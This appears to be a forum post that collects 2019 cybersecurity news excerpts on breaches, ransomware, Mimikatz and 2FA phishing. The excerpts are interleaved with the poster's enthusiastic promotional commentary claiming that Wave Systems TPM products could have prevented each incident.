“Let me just send one last message to our cyber adversaries,” Nielsen said Monday. “You cannot hide behind your keyboards and computer screens, we are watching you. And no matter what malware you develop, I promise you, the engines of our democracy are far stronger and far more resilient than any code you can write.”
She also said her department is taking more steps to identify cyber threats within the supply chain. Authorities have repeatedly warned that technology manufactured in another country like China could pose a threat to national security.
And Nielsen said that DHS is increasingly working with the Department of Defense to address cyber issues, after she and former Defense Secretary James Mattis signed an agreement last year to share more information about cyber incidents and operations.
“It has really helped us knit together and leverage each other's capabilities,” she said. “We analyze the threat together.”
=================================================================
The results of the current cybersecurity being used to battle these hackers is basically summed up in this article. Computer companies have spent billions of dollars on a built in security chip called the TPM which is on the enterprise computer's motherboard. Why not turn them on, the services that go with it, and see why 150+ companies back this international standard? The TPM 'turn on' could MAGA!!!
=================================================================
https://www.wavesys.com/
Fourth Major Credential Spill in a Month Hits DreamMarket
https://threatpost.com/fourth-credential-spill-dreammarket/142901/
Gnosticplayers has released about 26 million records from what he said are breaches of six new companies.
The hacker behind more than 840 million account records appearing for sale on the Dark Web in February (in dumps collectively known as Collections 1-3) is back with 26.42 more records from six companies.
The adversary, who goes by the handle Gnosticplayers, is asking just 1.2431 in Bitcoin (roughly $4,940), according to ZDnet, which spotted the records for sale on DreamMarket over the weekend.
With this latest credential dump, a total of 38 companies have found their users’ account data up for sale on the underground at the hands of Gnosticplayers. The six companies impacted this time are an eclectic bunch, comprising the GameSalad developer platform, a Brazilian Amazon-equivalent called Estante Virtual, project-management apps Coubic and LifeBear, and two Indonesian companies: The Bukalapak e-commerce giant and a student career site, YouthManual
The hacker told ZDnet that he obtained these records just last month, and that they all lacked strong encryption for their passwords. So far, the records haven’t been confirmed as legitimate, but if past is prologue, it’s worth noting that previous collections were confirmed as containing real user data.
Gnosticplayers told the outlet that the “lack of security in 2019 is making me angry” – but the motivation seems less than altruistic given the financial gain he’s looking for; he admitted to trying to extort companies in exchange for not publishing the credentials. Some gave into his demands and so their records weren’t published, he claimed.
“After four rounds of user records being put up for sale by this entity, there is a clear pattern that speaks to the way we utilize personal data,” George Wrenn, CEO at CyberSaint Security, said via email. “This data – 26 million records – was obtained within just the past few months. This is not a small incident, as mass amounts of individuals’ personal data is being sold. If anyone had any doubts before, this example should convince them that data truly is the new currency.”
If the claim that the records are freshly hacked turns out to be true, that will be a departure from the previous collections; Collection #1 for instance contained records culled from breaches that occurred as far back as 2010, including the well-known compromise of Yahoo. Fresher data translates into more acute danger of course; users are less likely to have rotated their passwords on accounts that were active a month or less ago. In other words, the account details are much less likely to be outdated.
That could give even more wings to the escalating issue of credential-stuffing and brute-force attacks, where cybercriminals bank on password reuse by trying stolen credentials against other, perhaps higher-value prey, such as online banking portals.
Some in the defense community are saying enough is enough.
“The frequent and recurrent instances of anonymous hackers selling large quantities of stolen identities emphasizes the profound impunity of these crimes,” John Gunn, CMO at OneSpan, said via email. “Using modern hacking tools, criminals can operate with little risk of being caught or ever brought to justice and the result is billions of dollars of losses. To me, this is a strong argument in favor of allowing counter attacks against these anonymous parties by state and private organizations.”
==================================================================
Wave VSC 2.0 has features that can prevent the criminals in this article from their nefarious activities on organizations!!! It truly is one of Wave's amazing solutions!
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpts:
Token-free, password-free user authentication
We know you’ve dreamt about shredding your list of passwords. Go on and do it.
Because you are starting the authentication process in the device’s hardware, the user doesn’t have to interact with it. All users see is their usual Windows log-in screen – no more additional passwords to access the VPN or other resources. They just sign in once, and the secure credentials in their TPMs securely and quickly connect them to everything they need. Say goodbye to user frustration and slow OS performance.
Key Features:
Superior User Experience
• No more tokens or smart cards to achieve two-factor authentication
• Eliminate VPN/WiFi/website passwords for faster access to resources
• No add-on software means improved OS performance
IoT Security Bills for US Government Will Also Affect Business IT
https://www.eweek.com/security/iot-security-bills-for-us-government-will-also-affect-business-it
==================================================================
If the U.S. government is serious about cybersecurity, why doesn't the U.S. government make the 'turn on' of the TPM a requirement for a better grade on security?! The link below shows one of the many benefits to the 'turn on' of the TPM.
==================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
House Dem introduces bill requiring public firms to disclose cybersecurity expertise in leadership
https://thehill.com/policy/cybersecurity/433880-house-dem-introduces-cyber-bill-that-would-require-publicly-traded
A Democrat on the House Intelligence Committee introduced a bill on Wednesday that would require publicly traded companies to disclose to investors whether any members of their board of directors have cybersecurity expertise amid growing cyberattacks targeting U.S. companies.
Rep. Jim Himes (D-Conn.) introduced the Cybersecurity Disclosure Act of 2019, a companion bill introduced in the upper chamber, that would make the Securities and Exchange Commission issue a new set of rules requiring U.S. companies to tell their investors whether they have someone who has cyber expertise on their board. If they don't, they must explain to their investors why this is the case.
The bill comes at a time when "cyberattacks and data breaches against U.S. companies are becoming more frequent and sophisticated," according to a press release accompanying the rollout of the bill.
The press release cited a study from Identity Theft Resource Center that found there was a 126 percent rise of data breaches that exposed records containing personally identifiable information. This rise took place across all industries, from 197.6 million in 2017 to 446.5 million in 2018.
"It's not only the shareholders of companies who are at risk," Himes said in a statement. "Americans' private and identifying information is in the hands of corporations who may not be prepared to protect it. The Cybersecurity Disclosure Act will give the public information about which companies are likely to have better protections and cyberdefense strategies."
"Publicly traded companies should have an obligation to let their shareholders know how they are addressing these serious threats or explain why they are not taking measures to counter attacks. Billions of dollars of American wealth are at risk, and I am tired of seeing American companies play catchup against our geopolitical rivals or lone-wolf threats," he continued.
The Senate companion bill has bipartisan support, with Sens. Jack Reed (D-R.I.), Mark Warner (D-Va.), Susan Collins (R-Maine) and John Kennedy (R-La.).
==================================================================
In light of this bill, 'better security at less than half the cost' could resonate faster with public companies! Wave solutions could become the 'go to' set of cybersecurity solutions!!
==================================================================
https://www.wavesys.com/
Marriott CEO reveals more details about the massive data breach
https://www.helpnetsecurity.com/2019/03/12/marriott-data-breach-details/
Last Thursday, Equifax CEO Mark Begor and Arne Sorenson, the CEO of Marriott International, appeared before a US Senate subcommittee to testify about the massive data breaches their companies have suffered.
While Begor’s statement was more about the security measures Equifax has implemented since the breach and the company’s plans to implement more protections and increase security investment, Sorenson’s revealed more information about the actual breach.
The Marriott breach post-mortem
As it was known soon after the breach was made public in November 2018, the attackers gained access to the Starwood Guest Reservation Database in the United States in 2014.
Marriott International acquired Starwood Hotels & Resorts Worldwide in September 2016, but at the time of the breach it had yet to retire it and migrate all of Starwood’s hotels onto Marriott’s reservation system (they finally did in December 2018).
The first indication that something might be wron was on September 8, 2018, when Accenture, which managed the Starwood Guest Reservation Database, notified Marriott’s IT team about an unusual query from an administrator’s account.
As it turned out, the query was not made by the individual whose credentials were used, and Marriott called in third-party investigators to investigate the scale and scope of the incident.
The investigators first uncovered a Remote Access Trojan used by the attackers, and then MimiKatz (a tool for discovering usernames and passwords in computer systems’ memory).
Proof that data from the Starwood Guest Reservation Database has been exfiltrated was discovered on November 13, when the investigators discovered evidence that two compressed, encrypted files had been deleted from a device that they were examining and that those two files had potentially been removed from the Starwood network.
“Six days later, on November 19, 2018, investigators were able to decrypt the files, and found that one contained an export of a table from the Starwood Guest Reservation Database containing guest data, while the other contained an export of a table holding passport information,” Sorenson explained.
“On November 25 and 26, we found that, in 2015 and 2016, prior to our acquisition of Starwood, the attacker had likely created a copy of two other tables, which the attacker later deleted. The file names correspond to two other tables in the Starwood Guest Reservation Database. We have been unable to recover those files and could not determine if they had been taken.”
Soon after they proceeded with notifying law enforcement, regulators, the public and affected customers.
The scope of the breach
The Marriott mega breach resulted in the compromise of:
•383 million guest records
•18.5 million encrypted passport numbers
•5.25 million unencrypted passport numbers (approximately 663,000 of which from US travelers)
•9.1 million encrypted payment card numbers.
•Several thousand unencrypted payment card numbers.
“To date, we have not found evidence that the master encryption keys needed to decrypt encrypted payment card and passport numbers were accessed, but we cannot rule out that possibility,” Sorenson shared.
He also said that, thus far, they have “not received any substantiated claims of loss from fraud attributable to the incident” and that the security firms they engaged to monitor the dark web have not found evidence that the stolen information has been offered for sale.
=================================================================
If Marriot used Wave VSC 2.0, the person making the query would have needed the computer (TPM) that was associated to the credentials used to have been able to do the query. Wave VSC 2.0 would have stopped this query from happening since the attacker would not have possessed the computer! Wave Endpoint Monitor could have stopped the Trojan! Wave solutions could have saved Marriot many millions of dollars!
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Get better security at less than half the cost
Passwords are weak. Tokens are expensive. Don’t compromise on security or price.
Wave Virtual Smart Card does anything your physical smart cards and tokens do, but it starts with hardware you already have: the Trusted Platform Module (TPM), a hardware security chip built into the motherboard of most business-class PCs. You may not even know you have it, but once you do, the TPM can be used in a myriad of ways. Wave turns it into a smart card, embedded directly into your laptop.
What can it be used for?
What do you use your smart card for today? With the exception of keying open the door at work, Wave Virtual Smart Card can perform any of the services or applications you rely on your smart card for today. Secure VPN, WiFi, remote desktop, cloud applications – it can all be done with a virtual smart card.
One helpdesk call you'll never get: "I lost my virtual smart card again..."
There are so many ways to lose a token – couch cushions, street drains, curious toddlers. In fact, up to 30% of all tokens are eventually lost. It’s much harder to lose a laptop, and you notice a lot faster when you do.
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
What will you do with >50% TCO savings?*
Tokens and smart cards require an additional hardware purchase, plus the time and money to ship to remote users. Use something that’s already in the users’ hands (the TPM), and your acquisition and deployment costs are lower.
Then consider the management savings in not having to replace lost and stolen tokens. That means fewer helpdesk calls, less interruption of user productivity, and fewer acquisition and shipping costs.
When we say “secure”…
…we mean it. Our solution starts with a proven hardware root-of-trust. Multi-factor authentication is an established best-practice for strong authentication: the TPM-based virtual smart card is one factor (something you have) and the user PIN is a second factor (something you know).
STOP Ransomware Installing Password Stealing Trojans on Victims
https://www.bleepingcomputer.com/news/security/stop-ransomware-installing-password-stealing-trojans-on-victims/
In addition to encrypting a victim's files, the STOP ransomware family has also started to install the Azorult password-stealing Trojan on victim's computer to steal account credentials, cryptocurrency wallets, desktop files, and more.
The Azorult Trojan is a computer infection that will attempt to steal usernames and passwords stored in browsers, files on a victim's desktop, cryptocurrency wallets, Steam credentials, browser history, Skype message history, and more. This information is then uploaded to a remote server that is under the control of the attacker.
When we first covered the DJVU variant of the STOP Ransomware being distributed by fake software cracks in January, we noted that when the malware was executed it would download various components that are used to perform different tasks on a victim's computer. These tasks include showing a fake Windows Update screen, disabling Windows Defender, and blocking access to security sites by adding entries to Windows's HOSTS file.
When ransomware researcher Michael Gillespie tested some recent variants he noticed that an Any.Run install indicated that one of the files downloaded by the ransomware created traffic that was from an Azorul infection. Gillespie further told BleepingComputer that four different samples all showed network traffic associated with Azorult.
BleepingComputer downloaded and installed a sample of the STOP Promorad Ransomware variant to see if Azorult would be installed.
When we executed the ransomware, it proceeded to download the files listed in the IOCs below and encrypt the computer. In this particular variant, when files are encrypted it will append the .promorad extension to encrypted files and create ransom notes named _readme.txt as shown below.
The Promorad Ransomware variant samples we tested also download a file named 5.exe and executed it. When executed, the program will create network traffic that is identical to known command & control server communications for the Azorult information-stealing Trojan.
Furthermore, when this file was scanned using VirusTotal, numerous security vendors detect this file as a password-stealing Trojan.
Being a victim of ransomware is bad enough, but to know that your passwords and documents may be stolen as well just adds another layer of issues that victims need to be concerned about.
Victims who have been infected with a STOP Ransomware variant should immediately change the passwords to any online accounts that are used, especially ones that are saved in the browser. Victims should also change passwords in software such as Skype, Steam, Telegram, and FTP Clients. Finally, victims should check any files stored on the Windows desktop for private information that may now be in the hands of the attackers.
STOP Ransomware has become a prolific extension with numerous variants and it is not currently known how long they have been installing Azorult. Therefore, to be safe all victims of STOP should perform the above remediation.
The known list of STOP extensions include:
If you have any concerns or questions regarding this ransomware, feel free to post in our dedicated STOP Ransomware Support & Help topic.
--There are a couple of diagrams at the link.
==================================================================
Three Wave solutions could have a tremendously positive impact against this ransomware!!
1. Wave VSC 2.0 can secure credentials and safely store them in the TPM.
2. Wave SED management with SEDs could have documents/files encrypted, and it could help provide the last layer of defense against the ransomware.
3. Wave Endpoint Monitor could spot the Trojan/malware.
==================================================================
https://www.wavesys.com/
1.
https://www.wavesys.com/products/wave-virtual-smart-card
2.
https://www.wavesys.com/products/wave-self-encrypting-drive-management
3.
https://www.wavesys.com/products/wave-endpoint-monitor
And more on 2FA:
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Google: Phishing Attacks That Can Beat Two-Factor Are on the Rise
https://www.pcmag.com/news/367026/google-phishing-attacks-that-can-beat-two-factor-are-on-the
Hackers have been refining their email phishing schemes to also nab the one-time passcode from two-factor authentication security setups, Google warns at RSA.
Don't expect two-factor authentication to always protect your accounts. Google has noticed an unsettling increase in phishing attacks that can defeat the security setup.
"We've seen a big rise in the number of phishable 2FA attacks," Nicolas Lidzborski, a security engineering lead for Gmail, said during a talk at the RSA cybersecurity show.
These "2FA phishing attacks" work by tricking the victim into handing over their password and a special one-time passcode protecting the Gmail account. Normally, this one-time passcode is hard to obtain since it's generated on a person's smartphone and expires after 30 seconds.
However, Lidzborski said hackers have been refining their password-stealing schemes to also nab the one-time passcode. So-called "phishing kits" steal a victim's password and two-factor authentication passcode as they type it into deceptive email and login pages, and then quickly break into the affected account within the 30-second time limit.
"2FA is much better than single factor, using a username and password. There's no doubt about it," he said. "However, we've seen attackers actively try to defeat 2FA."
In December, Amnesty International said it noticed one hacking group defeating two-factor protection through the help of an automated phishing attack that can steal and plug in the passcodes before the 30-second time limit runs out. A month later, a security researcher released an open source toolkit, which can also create phishing pages to defeat two-factor.
It doesn't help that the one-time passcode generated over two-factor authentication can also sometimes be sent over SMS messaging. That can make two-factor authentication vulnerable to SIM swapping attacks, in which the hacker impersonates a target to steal their mobile phone number from the wireless carrier.
"This is the loophole. People can potentially go after the phone provider, get the number transferred and get the 2FA," he added.
During the talk, Lidzborski said Google has been trying to protect Gmail accounts from successful phishing attacks by blocking login attempts from unfamiliar geographic locations. The company's email service can also warn you about emails that appear to be phishing attempts and about the dangers of clicking the suspicious links inside them.
But to stay protected, Lidzborski recommends users and businesses adopt a hardware-based solution: USB security keys. They work by supplanting the one-time passcodes in two-factor authentication with a physical piece of hardware, which you can plug into your PC to access your internet accounts. In July, Google reported that it had given all its employees security keys as a way to stop account takeovers on work-related accounts, stop account takeovers in their tracks.
Unfortunately, security keys aren't cheap. Google's own product costs $50 for two keys. However, Lidzborski said the technology can make an organization "unphishable."
"If you get phished, you have to really invest into the next level," Lidzborski told PCMag. "It is painfully internally to switch to unphishable 2FA. But until you do so, the attacker will succeed ultimately."
Lidzborski couldn't quantify the exact rise in two-factor phishing attacks Google has seen. On average, the company encounters 100 million phishing messages per day. But in the past only the most sophisticated hackers, such as nation-state cyberspies, employed phishing attacks that could defeat two-factor authentication, he said. "Now it's available as an open-source phishing framework," he added. "So it is an order of magnitude more prevalent than before."
The news is a reminder to be cautious around your email inbox. Phishing emails can often look like legitimate services, such as Google, and will try to trick you into visiting an official-looking login page, when in reality the site is designed to steal your passwords. To teach the public how to spot phishing attacks, Google's Jigsaw last month helped developed a phishing quiz, which can teach you more about the threat.
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpts:
Get better security at less than half the cost
Passwords are weak. Tokens are expensive. Don’t compromise on security or price.
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
==================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpts:
Key Features:
Strong Security
• Authenticate securely, encrypt email, and prove integrity of the device with one management console
• Protect against phishing, malware and other network security threats by storing authentication credentials in hardware
• Provide centralized enforcement of custom policies
Superior User Experience
• No more tokens or smart cards to achieve two-factor authentication
• Eliminate VPN/WiFi/website passwords for faster access to resources
• No add-on software means improved OS performance
Citrix discloses security breach of internal network
https://www.zdnet.com/article/citrix-discloses-security-breach-of-internal-network/
Citrix learned of the hack from the FBI. Hackers stole business documents.
American software company Citrix disclosed today a security breach during which hackers accessed the company's internal network.
In a short statement posted on its blog, Citrix Chief Security Information Officer Stan Black said Citrix found out about the hack from the FBI earlier this week.
"On March 6, 2019, the FBI contacted Citrix to advise they had reason to believe that international cyber criminals gained access to the internal Citrix network," Black said.
"While not confirmed, the FBI has advised that the hackers likely used a tactic known as password spraying, a technique that exploits weak passwords. Once they gained a foothold with limited access, they worked to circumvent additional layers of security," the Citrix exec added.
Black said hackers accessed and downloaded business documents, but Citrix wasn't able to identify what specific documents had been stolen at the time of his announcement today.
The Citrix exec said that there is no evidence to suggest that hackers might have tampered with Citrix official software or other products.
The hack is still under investigation, and Black promised more updates on the incident as they learn more.
An NBC report published today shortly before the Citrix announcement and citing a source with Resecurity claimed that a group of Iranian state hackers called "Iridium" might be behind this hack. Resecurity said that Iridium breached Citrix's network during the Christmas 2018 holiday.
Resecurity said hackers used techniques to bypass two-factor authentication and gain access to Citrix's internal network from where they accessed roughly 6TB of information.
A Citrix spokesperson declined to comment on the NBC report and Resecurity blog post --which convey substantially different information from the company's data breach announcement-- when ZDNet reached out earlier today. Resecurity's findings have been questioned in the past.
In December 2018, Citrix reset passwords for some users of the Citrix ShareFile service after it detected a credentials stuffing attack against its customers. However, this attack is unrelated to today's data breach announcement as this targeted Citrix's customer network and customer accounts, and not its internal network and employee accounts.
Article updated with information about the NBC report, the Resecurity blog post, the December 2018 attack, and the Citrix refusal to comment.
==================================================================
It's hard to believe that Citrix wouldn't be using some form of enterprise two factor authentication to protect its sensitive information. Weak passwords was their protection?!? If their two factor authentication was bypassed or if they are still using weak passwords, it's time for Citrix and other organizations to take advantage of the many awesome positives by using Wave VSC 2.0!!!
=================================================================
https://www.wavesys.com/
Major Windows 7 zero-day discovered, enables privilege escalation in combination with another Chrome exploit
https://www.techspot.com/news/79089-major-windows-7-zero-day-discovered-enables-privileged.html
Microsoft believes it only affects Windows 7 32-bit systems
Why it matters: Google's Threat Analysis Group released details on Thursday of an exploit that allows privileged escalation in Windows when used in conjunction with a recently patched Google Chrome vulnerability. Google recommends that Chrome users restart their browser to ensure the patches are applied. Microsoft recommends that users update to Windows 10.
Security researchers at Google and Microsoft have observed attackers using a combination of a patched Chrome vulnerability and an unpatched Windows vulnerability to take advantage of Windows 7 systems. The announcement of the issue comes as part of their responsible vulnerability disclosure policy.
The Windows bug is a null pointer dereference in the win32k.sys kernel driver, while the Chrome bug is a use-after-free in the FileReader component. Both of these bugs deal with accessing memory that should not be accessed by the user.
Most modern web browsers use a "sandbox" to help protect against online attacks. This is similar to a virtual environment that websites and their associated code run in. These sandboxes are supposed to ensure that untrusted code can't get out and access system resources, but combining these two bugs allows for just that. Once code has broken out of the sandbox, it can access sensitive parts of the operating system and users' files.
Google patched this vulnerability last Friday, but unlike most updates which take effect immediately, this patch requires a manual restart by the user. The Windows vulnerability has yet to be patched but Microsoft believes it only affects Windows 7 32-bit systems. In the meantime, Microsoft is recommending that all users still running Windows 7 should upgrade to Windows 10.
=================================================================
I think what the article is saying is that once code has broken out of the sandbox, the hacker with the code can access sensitive parts of the operating system and users' files. Information there can be used to log into a user's computer and the network and escalate privileges on a computer. If the users had Wave VSC 2.0, the sensitive information to log onto a computer can't be used to logon since the hacker doesn't have the computer (TPM)!! The stopping of privilege escalation (using Wave VSC 2.0)could protect the users and keep them from having to upgrade to Windows 10. A summary of Wave VSC 2.0 is at the link below. The Wave ERAS link also helps!
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
12,449 Data Breaches Confirmed in 2018, a 424% Increase Over the Previous Year
https://www.bleepingcomputer.com/news/security/12-449-data-breaches-confirmed-in-2018-a-424-percent-increase-over-the-previous-year/
The number of confirmed data breaches during 2018 reached 12,449, a 424% increase when compared with 2017, 47% of all compromised identity records having been exposed in breaches experienced by organizations from the United States and China.
4IQ, the identity intelligence company which published this report on the breached data landscape and trends, also discovered that, while the number of breaches saw a substantial boost last year, the average breach sized decreased to 216,884 records, a value 4.7 times smaller than the year before.
The company defines data breaches as confirmed incidents "where credentials, personal, medical, financial or other records with sensitive data have been accessed or disclosed due to being hacked or leaked, either deliberately or by accident."
The United States leads the ranks in the number of identity records exposed
The report also unearths the fact that crooks also switched their attention from harder to infiltrate large organizations and corporations to the less protected small businesses, a trend which also contributed to the massive four times increase in the number of breaches detected during 2018.
While on the whole United Stated data breaches haven't been as numerous as the ones from other countries, the size of the breaches contributed heavily to the large number of identity records being exposed throughout the year as part of US incidents, roughly 32% of the total number of curated records detected in such incidents around the world.
2018 also saw an important 71% jump in underground activity, with 14.9 billion raw identity stolen records being circulated and exchanging hands, although only 3.6 billion of them were new and authentic.
"As our personal data continues to get exposed and circulated in underground markets, the problem of identity-based attacks is only growing," said 4iQ CEO Monica Pal.
Also, "Consumers need to do what they can to prevent problems, like enable two-factor authentication, use a password manager, etc. but then they also need to take a proactive approach to protect themselves by signing up for identity theft protection services which include exposure alerts and help with remediation and insurance."
During 2018 breaches became "the new normal"
In addition, "Government was the largest growing exposed sector in 2018, increasing over 291 percent from 2018," said 4iQ co-founder and CTO Julio Casal. "This may be the result of mid-term elections and increasing geopolitical tensions. For the first time, we saw underground brokers actively including citizen data, such as voter databases, as part of their data portfolio."
2018 was also the year of Internet-connected data storage devices left exposed for everyone to access, which could translate into a more careful approach during 2019, with companies and organizations being more careful when securing their databases.
4iQ also highlights the same big data breaches impacting large companies that led to millions of identity records being exposed per incident:
2018 saw companies like Google, Facebook, and Marriott make headlines as well. With new breaches being reported on an almost daily basis, “breach fatigue” has set in, with their occurrence becoming the “new normal.”
4iQ's 2019 Identity Breach Report uses data assembled from a far-reaching collection of both leaked and breached data obtained from open sources available on the surface, deep and dark web, as well as from black markets, social media, and underground forums and communities.
This data was collected with the help of automated crawlers and it was analyzed by the company's breach-hunting team using data curation and verification methodology and tools.
==================================================================
The existing solutions for preventing breaches based on the statistics in this article haven't been working very well. Why not try something that really works like Wave VSC 2.0?!! The trend should be getting better with time and with the right solutions. The cybersecurity results have been in disarray for far too long. Wave's cybersecurity solutions could be a great addition to a LOT of organizations and have an extremely positive impact on organizations' cyber defenses.
=================================================================
https://www.wavesys.com/
What is Mimikatz? And how to defend against this password stealing tool
https://www.csoonline.com/article/3353416/what-is-mimikatz-and-how-to-defend-against-this-password-stealing-tool.html?utm_source=twitter&utm_medium=social&utm_campaign=organic
Mimikatz is a powerful tool when attacking — or defending — Windows systems. Here's what you need to know to get up to speed.
Mimikatz definition
Mimikatz is a leading post-exploitation tool that dumps passwords from memory, as well as hashes, PINs and Kerberos tickets. Other useful attacks it enables are pass-the-hash, pass-the-ticket or building Golden Kerberos tickets. This makes post-exploitation lateral movement within a network easy for attackers.
Mimikatz, described by the author as just "a little tool to play with Windows security,” is an incredibly effective offensive security tool developed by Benjamin Delpy. It is used by penetration testers and malware authors alike. The destructive 2017 NotPetya malware rolled leaked NSA exploits like EternalBlue together with Mimikatz to achieve maximum damage.
Originally conceived as a research project by Delpy to better understand Windows security, Mimikatz also includes a module that dumps Minesweeper from memory and tells you where all the mines are located.
Mimikatz is not difficult to use, and Mimikatz v1 comes bundled as a meterpreter script as part of Metasploit. The new Mimikatz v2 upgrade has not yet been integrated into Metasploit as of this writing.
The name "mimikatz" comes from the French slang "mimi" meaning cute, thus "cute cats." (Delpy is French and he blogs on Mimikatz in his native language.)
How does Mimikatz work?
Mimikatz exploits Windows single sign-on (SSO) functionality to harvest credentials. Until Windows 10, Windows by default used a feature called WDigest that loads encrypted passwords into memory, but also loads the secret key to decrypt them. WDigest has been a useful feature for authenticating large numbers of users on an enterprise or government network, but also lets Mimikatz exploit this feature by dumping memory and extracting the passwords.
In 2013, Microsoft made it possible to disable this feature as of Windows 8.1, and it is disabled by default in Windows 10. However, Windows still ships with WDigest, and an attacker who gains administrative privileges can simply turn it on and run Mimikatz
The rest of the article is at the link.
==================================================================
The hacker will have to gain administrative privileges on a computer to simply turn on WDigest and run Mimikatz. Wave VSC 2.0 could prevent the hacker from doing that with the PIN stored in the TPM and the TPM as a second factor of authentication.
Post exploitation to move laterally across the network wouldn't work for hackers either since they would have to have the computer(TPM) and PIN.
Stopping Mimikatz is a great reason for organizations to be using Wave VSC 2.0!!!
In the article, the author says that Mimikatz will likely remain an effective offensive security tool on Windows platforms for many years to come.
If Wave VSC 2.0 is used defensively by organizations the Mimikatz offensive tool (used by hackers) could be thwarted.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpts:
Token-free, password-free user authentication
We know you’ve dreamt about shredding your list of passwords. Go on and do it.
Because you are starting the authentication process in the device’s hardware, the user doesn’t have to interact with it. All users see is their usual Windows log-in screen – no more additional passwords to access the VPN or other resources. They just sign in once, and the secure credentials in their TPMs securely and quickly connect them to everything they need. Say goodbye to user frustration and slow OS performance.
Why Ransomware Is Still An Active Threat
https://www.eweek.com/security/why-ransomware-is-still-an-active-threat
RSA Conference 2019: Ransomware in 2019 doesn't have the same volume as it did in 2017, but that doesn't mean it isn't an impactful threat.
SAN FRANCISCO - For several years, ransomware was a rising threat, causing hundreds of millions of dollars in damages and disrupting operations around the world.
But what is the state of ransomware in 2019? In a session at the RSA Conference here, a pair of McAfee researchers detailed how the threat landscape for ransomware has changed and where it is headed. They also provided insight into what organizations can now do to help minimize the risk of being a victim of ransomware.
"There is a myth that ransomware is dying, but it's not," Raj Samani, Chief Scientist, McAfee told eWEEK in an interview. "We've seen a lot of activity with Gandcrab over the last 12-24 months and that's not going away."
Ransomware is an attack in which a victim's system is somehow compromised or infected with some form of malware, which then encrypts user data. The user is then asked to pay a fee, or a 'ransom' to the attacker in order to get their data back.
Gandcrab is a particularly virulent form of ransomeware that has been successful at infecting users. Samani said that it has been a game of 'cat and mouse' between gandcrab and the cyber-security industry.
Samani noted that the NoMoreRansom project, which is a multi-stakeholder effort to help individuals and end users protect themselves against ransomware, posted a new version of a decrypter tool for Gandcrab at the end of February. Within hours of the decrypter tool release, Samani said that the gandgrab authors had already released a new version of the ransomware, that the tool wasn't able to decrypt.
Gandcrab
So what exactly is Gandcrab? Samani said that it's a ransomware-as-a-service operation, where any hacker can make use of the service to launch their own attack.
Samani said that by looking at the underlying code infrastructure of Gandcrab, it's possible to map out the affiliates that are using the ransomware. In the Gandcrab ransomware as a service model the operators and developers of Gandcrab have affiliates that target victims. The affiliates will then pay the primary Gandcrab operators a percentage of the ransom, when a victim pays.
While Gandcrab is still an active risk, one thing that has changed is the volume of new ransomware families. In the fourth quarter of 2017, Samani said that there was approximately 2.2 million new ransomware samples. By the second quarter of 2018 the volume of new ransomware declined to just over one million.
"New ransomware growth is significantly lower than we had once expected, but that only tells part of the story," he said.
The other part of the story, is that while new ransomware has declined, organizations, as opposed to random individuals, are being increasingly targeted. Samani said that for example the Ryuk ransomware family only goes after a limited number of companies. He said that while broad based ransomware attackers like crytolocker only tended to ask for approximately $400 in ransom, Ryuk tends to ask for $100,000, or more. Rather than a random form of infection, Ryuk often gets into organizations by exploiting Remote Desktop Protocol (RDP)
"The noisy ransomware with lots of attack volume are certainly still around but they are not as prevalent as they were before," Samani said. "Now we're seeing more criminal operations, doing research in the organizations they attack and then dropping in ransomware."
Samani said that Ryuk for example has made $4 million in ransom in the past five months.
"So, the overall volume may have decreased but the impact to companies has increased, " he added.
How To Defend Against Ransomware
In 2016, McAfee was one of a number of firms that helped to start the NoMoreRansom effort, which Samani said has had a positive impact on reducing the risk of ransomware attacks. Samani said that one of the goals of the RSA Conference talk is to encourage more companies and groups to join NoMoreRansom and support the effort to eliminate ransomware.
NoMoreRansom now has over 85 tools available to help combat ransomware and benefits from the support of over 140 vendors and organizations.
Aside from NoMoreRansom, Samani said that the single most important thing that any organization can do to help minimize the risk of ransomware is to have a backup of their data. While backing up data might seem like common sense, there are still many organizations that don't do it.
Samani said that data security is still a somewhat abstract idea for many organizations. He said that data breaches are often reported in terms of how many records were lost, but rarely, if ever do reports actually quantify the impact on real people and organizations.
"Everybody is aware about cyber-security risks and yet, how many people back up their data?" Samani said. "I don't think the issue is a lack of awareness. I think the issue is a lack of understanding."
Overall, Samani said that in his view cyber-security isn't all that hard, the simplest things for a user to do are to change passwords regularly, not to click on un-known links in emails and have a backup.
"If every single person did those things how many threats would we see? It would be reduced by 90 percent," he said.
=================================================================
At the end of the article there were three things to do for cybersecurity, and for enterprises, Wave offers some better solutions:
1. Changing passwords can be substituted with better (2FA) program in Wave VSC 2.0.
2. Most users click on links that are creatively disguised, and phished credentials can be protected by Wave VSC 2.0 with a second factor of authentication in the TPM.
3. Backups are good, but some ransomware encrypts the backups as well. SEDs and Wave SED management is an important final layer to stop the ransomware. The malware aspect of the ransomware could be sneaky, and Wave Endpoint Monitor as a layer of protection could spot that malware better than other antivirus software.
=================================================================
RDP is remote desktop protocol and one of the options that ransomware can exploit. One of Wave VSC 2.0 key features is
remote desktop access. The Wave VSC 2.0 (2FA) could keep the ransomware from exploiting the RDP.
==================================================================
